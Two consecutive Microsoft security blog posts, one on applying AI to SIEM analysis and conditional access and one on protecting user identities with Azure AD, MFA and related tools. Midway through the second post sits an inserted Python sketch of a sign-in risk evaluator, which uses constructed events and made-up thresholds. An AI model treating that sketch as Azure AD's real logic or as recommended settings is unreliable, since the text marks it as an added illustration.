If you are skeptical, I understand. I often tell a story about how for many years at the annual RSA Conference, vendors and customers rallied around themes such as the year of the smart card, the year of biometrics, the year of machine learning, the year of blockchain. Some of these technologies never lived up to their promise, and many are still nascent and immature in their application, architecture, and use cases. But I think there are practical applications of AI that will meet our expectations, especially when it comes to cybersecurity. If one reflects on broad-based attacks like WannaCry and NotPetya and critical vulnerabilities like Spectre and Meltdown, it only stands to reason that the attack surface is rapidly growing, the bad actors are becoming more sophisticated, and the need for tool evolution is compelling. AI is the path to that evolution. As an industry, we need to be cautious in how we position and explain machine learning and AI, avoiding confusion, conflating capabilities, and overpromising results. There is definitely a place for both, and they are highly complementary. AI has the power to deliver on some of the legacy promise of machine learning, but only if it is trained, architected, and implemented properly.

Like all technologies, there is a risk that AI will be misused or poorly used. For the purpose of this blog, I ask you to make the assumption that the tech is being used ethically, the engines are properly trained in a non-biased manner, and the user understands the full capability of the technology they are deploying. Am I asking you to suspend reality? No, I am simply asking you to imagine the potential if we fully harness AI to further improve our cybersecurity defenses and recognize the threat of bad actors who will also embrace AI now and in the future. Please also read The Future Computed: Artificial Intelligence and its role in society by Brad Smith and Harry Shum for a broader vision on AI and its role in society.

Using AI to gain powerful insights

There are several use cases where AI is interesting for cybersecurity applications, but let's first start with what is possibly the most obvious use case: making sense of signal and intelligence. Collective sigh, readers, before continuing. I understand the consternation related to legacy SIEM solutions, and your visceral response. SIEM solutions were purpose-built to collect logs and data from a wide range of sources, largely for compliance, and they do this particularly well. They also enable users to effectively produce reporting specific to a use case. They do not, however, work well in detecting real-time attacks and allowing an organization to automate and/or orchestrate defenses that will minimize damage to the organization.

Take a moment to think about how powerful it would be to apply the machine learning algorithms that exist today to the data and logs that SIEM collects. AI could reason over the data at global scale in near real-time using the cloud and produce attack scenarios, which you could then tie to a security operations tool that automates the response and defenses based on the outcome of the AI reasoning. With a large volume of globally sourced data, you could use AI to look at anomalies in the behavior patterns of humans, devices, data, and applications at scale and make accurate predictions of the threats to your enterprise, allowing you to deploy defenses well in advance of a specific attack. AI, when trained and deployed properly, has the ability to allow your enterprise to be this effective. You can continue to gain value from the on-premise SIEM infrastructure you built and use the data you gathered for historical context. The cloud provides a true value in this use case in its ability to analyze the data at a global scale. And finally, AI will become predictive as it learns what is normal and what isn't normal. You can then automate responses via tooling that will allow your admins to focus only on the highest value tasks. AI will reduce the workload of security administrators in the short term, reducing duplication and increasing efficacy of signal.

Intelligently secure conditional access

My ability to write this blog from the beach is evidence that today's systems for conditional access are good and getting better. The ability to provide access control based on the authentication of the user, device, data, application, and known geo-location provide us a certain level of confidence. The tools that exist can potentially maintain state, have the potential to be quite granular, and are powered by global cloud networks. They often use machine learning to detect anomalous behavior, but today's tooling suffers from a dependence on legacy architecture, technical debt, dependence on the integration of disparate authentication systems, and hybrid systems. The tooling is often built for just one environment, one use case, or one system of record. In most large, complex enterprises, security admins don't have the luxury of using the most up-to-date tools for a single environment or use case. Their environments are complex, the attack surface is large, and their users are often unaware of sophisticated security risks. I encounter this in my own home when I explain to family members the inherent risks of free, public Wi-Fi, as an example.

AI for conditional access use cases is not only practical, it's necessary. We have long lived with an employee base that is working from a large variety of personal and company-issued devices and working from a wide range of locations including corporate owned office space, shared work facilities, coffee houses, hotel rooms, conference facilities, and other global locations. There is also still a gap in the security industry related to the percentage of the population that owns and successfully deploys Multi-Factor Authentication (MFA) tooling. Biometrics has actually made MFA more ubiquitous by reducing the friction and expense of purchasing and deploying authentication systems, but organizations are still not investing in MFA across 100 percent of their enterprises. Cybersecurity, like many fields, operates on a risk model. High risk applications and users equal higher security profiles and tools. Now, imagine if we can reduce the risk while also reducing the friction of rolling out tools? AI is dependent on data and good architects and developers to truly live up to its promise, but it is systems agnostic. The data you supply from your mainframe is not ranked higher in priority than the data you supply from the cloud, unless you create a scenario where you desire specific data types to be higher priority or ordinal in ranking.

Conditional access, powered by AI reasoning over the behavior of the user, device, data, application, network, location, etc., has the ability to create much safer data access for companies and reduce the overall risk. Imagine a dynamic, real-time, global environment where, regardless of where your users choose to work, you can determine their precise level of access and change their level of access in real-time without human intervention. Did something change that causes concern, and would you like your user to reauthenticate? Do you want to block access to some or all systems? Do you want to block access to certain data sets or require some level of encryption? The AI engine, linked with automated tooling, will give you this ability and provide the logging and reporting needed to support the automated actions or human intervention. Your ability to integrate with current tooling to enforce the actions will be the highest bar to full usage in your environment.

There are no silver bullets when it comes to technology and, particularly, cybersecurity. I have talked about two use cases where I believe AI can improve cybersecurity, but there are others as well, such as AI's ability to allow more robust device-related IoT detection, sophisticated malware detection, and improvements in vulnerability management. The bad actors will continue to innovate and create weapons that can be deployed for large scale attacks. The attack surface is growing with the proliferation of IoT devices on corporate networks and control systems. As an industry, we have a moral responsibility and imperative to continue improving processes, training, and technology to meet new and yet to be developed threats. Artificial intelligence is one weapon in our tool bag. It must be used prudently. And when used effectively, it can truly be a change agent for the industry. Check out my blog, Application fuzzing in the era of Machine Learning and AI, where I wrote about application fuzzing and AI.

Check back in a month when I will blog about how we can use AI to improve device-related IoT detection. In the meantime, I invite you to follow me at @ajohnsocyber.

The post Practical application of artificial intelligence that can transform cybersecurity appeared first on Microsoft Secure.

Protecting user identities


This is a blog series that responds to common questions we receive from customers about the deployment of Microsoft 365 security solutions. In this series, you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Cybersecurity threats: How to discover, remediate, and mitigate, the third blog in our eight-part series on deploying Intelligent Security scenarios.

It's not just a problem for consumers. Identity theft in the workplace is also on the rise, and with good reason. Stealing employee credentials is an easy path to bypassing security around sensitive data, making unauthorized purchases, and many other cybercrimes.

Microsoft 365 security solutions help you protect users and corporate accounts. By making identity the control plane, Microsoft 365 offerings manage identities as the first step to providing access to corporate resources and restricting users who are high risk. Tools like single sign-on (SSO), Multi-Factor Authentication (MFA), and Windows 10 Hello for Business help you secure access. Additionally, there are actions you can take if an identity is compromised and ways to lock down or wipe devices to protect sensitive data in case of loss or theft.

How do I provide secure access for my users?

Managing identities is the first step in protecting your environment. You can provision user identities through Azure Active Directory (Azure AD) and then connect to your on-premises Active Directory, allowing you to centralize identities for each user. Then you can set conditional access policies in Azure AD (Figure 1) for users in your organization. Conditional access policies allow you to control how users access cloud apps. You can set conditions that restrict access based on sign-in risk, user location, or client app, as well as only allowing access to managed devices. Start by implementing recommended identity access policies.

Managing user access is your next step. Azure AD SSO lets you manage authentication across devices, cloud apps, and on-premises apps with one user sign-in. Once you enable SSO, your employees can access resources in real-time on any device in addition to confidential or sensitive work documents away from the office. Next, deploy MFA in Azure AD to reauthenticate high-risk users, and take automated action to secure your network.

Figure 1. Set user policies using Azure AD conditional access.

Finally, encourage your employees to use Windows Hello for Business. It's a security feature that allows users to unlock their device using their PC's camera, a PIN, or their fingerprint.

How do I ensure that my employees' credentials are not compromised?

What's needed is a multi-layered approach to identity protection that goes beyond passwords and starts to identify risk even before a password is entered.

Early and active monitoring of potential threats is essential. With Azure AD Identity Protection, you get an overview of risk and vulnerabilities that may be affecting your organization's identities. You can then set up risk-based conditional access policies to automatically mitigate threats. Risk-based conditional access uses machine learning to identify high-risk users. For example, a user may be flagged based on unfamiliar locations or failed sign-ins from the same IP address. Once flagged, a user can be required to use MFA in Azure AD or be blocked altogether (Figure 1).
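The risk signals described here, and the conditional access decisions sketched in the preceding AI post, as an added example that is not Azure AD Identity Protection's engine or policy format: a hypothetical evaluator replays constructed sign-in events, treats repeated failed sign-ins from one IP as high risk and a country the user has never signed in from as medium risk, and maps risk plus device state to allow, require MFA, or block. The thresholds, window, and event fields are assumptions.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Constructed sign-in events (not real telemetry). auth_ok means the password
# check passed; conditional access decides only for those, but failures still
# feed the risk signals.
SIGNINS: List[Dict] = [
    {"ts": "2018-09-10T08:00:00", "user": "alice", "ip": "203.0.113.7",
     "country": "US", "managed_device": True, "auth_ok": True},
    {"ts": "2018-09-10T09:00:00", "user": "alice", "ip": "203.0.113.7",
     "country": "US", "managed_device": True, "auth_ok": True},
    {"ts": "2018-09-10T10:00:00", "user": "alice", "ip": "198.51.100.42",
     "country": "RO", "managed_device": True, "auth_ok": True},
] + [
    # five password failures against bob from one IP within a few minutes
    {"ts": f"2018-09-10T10:3{i}:00", "user": "bob", "ip": "198.51.100.9",
     "country": "US", "managed_device": False, "auth_ok": False}
    for i in range(5)
] + [
    {"ts": "2018-09-10T10:35:00", "user": "bob", "ip": "198.51.100.9",
     "country": "US", "managed_device": False, "auth_ok": True},
    {"ts": "2018-09-10T11:00:00", "user": "carol", "ip": "192.0.2.5",
     "country": "US", "managed_device": False, "auth_ok": True},
    {"ts": "2018-09-10T11:30:00", "user": "carol", "ip": "192.0.2.5",
     "country": "US", "managed_device": False, "auth_ok": True},
]

FAILED_SIGNIN_THRESHOLD = 5                  # hypothetical tuning values
FAILED_SIGNIN_WINDOW = timedelta(minutes=15)


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def known_countries(history: List[Dict], user: str) -> Set[str]:
    """Countries this user has previously signed in from successfully."""
    return {e["country"] for e in history if e["user"] == user and e["auth_ok"]}


def failed_sign_ins_from_ip(history: List[Dict], ip: str, now: datetime) -> int:
    """Password failures from one IP (any user) inside the look-back window."""
    return sum(1 for e in history
               if e["ip"] == ip and not e["auth_ok"] and now - _ts(e) <= FAILED_SIGNIN_WINDOW)


def sign_in_risk(event: Dict, history: List[Dict]) -> Tuple[str, List[str]]:
    """Risk level plus the reasons behind it. A user's very first sign-in has no
    known countries yet, so it is deliberately treated as an unfamiliar location."""
    reasons = []
    if failed_sign_ins_from_ip(history, event["ip"], _ts(event)) >= FAILED_SIGNIN_THRESHOLD:
        reasons.append("failed-sign-ins-from-ip")
    if event["country"] not in known_countries(history, event["user"]):
        reasons.append("unfamiliar-location")
    if "failed-sign-ins-from-ip" in reasons:
        return "high", reasons
    return ("medium" if reasons else "low"), reasons


def conditional_access(event: Dict, history: List[Dict]) -> Tuple[str, List[str]]:
    """Policy: block on high risk; MFA on medium risk or an unmanaged device; else allow."""
    level, reasons = sign_in_risk(event, history)
    if level == "high":
        return "block", reasons
    if level == "medium" or not event["managed_device"]:
        return "require-mfa", reasons
    return "allow", reasons


def evaluate_stream(events: List[Dict]) -> List[Tuple[str, str, List[str]]]:
    """Replay events in time order; each is judged against only what came before it."""
    history: List[Dict] = []
    decisions = []
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["auth_ok"]:
            action, reasons = conditional_access(e, history)
            decisions.append((e["user"], action, reasons))
        history.append(e)
    return decisions


if __name__ == "__main__":
    for user, action, reasons in evaluate_stream(SIGNINS):
        print(f"{user:6} {action:12} {reasons}")
```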

Another useful monitoring tool is Azure AD Privileged Identity Management (PIM). With Azure AD PIM, you can monitor admin access to resources and minimize the number of people who have access to them. By continuously monitoring these high access points, you limit vulnerabilities. You can configure Azure AD PIM in the Azure portal to generate alerts when there's suspicious or unsafe activity in your environment and then recommend mitigation strategies.

Along with monitoring, Microsoft 365 security solutions offer tools to better protect a user's credentials. Windows Defender Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them, thus helping prevent unauthorized access to these secrets which can lead to credential theft attacks.

Deployment tips from the experts

Start by managing user identities as your control plane. Provision your user identities through Azure AD and use Azure AD Connect to integrate identities across Azure AD and your on-premises AD. Enable MFA for all administrators, set conditional access policies, and initiate SSO.

Manage your devices from the cloud. Managing employee devices remotely engenders productivity and bolsters security. Deploy Microsoft Intune as your mobile device manager for company- and employee-owned devices.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the Protect your users and their identity white paper. You can find additional security resources on Microsoft.com.

More blog posts from this series: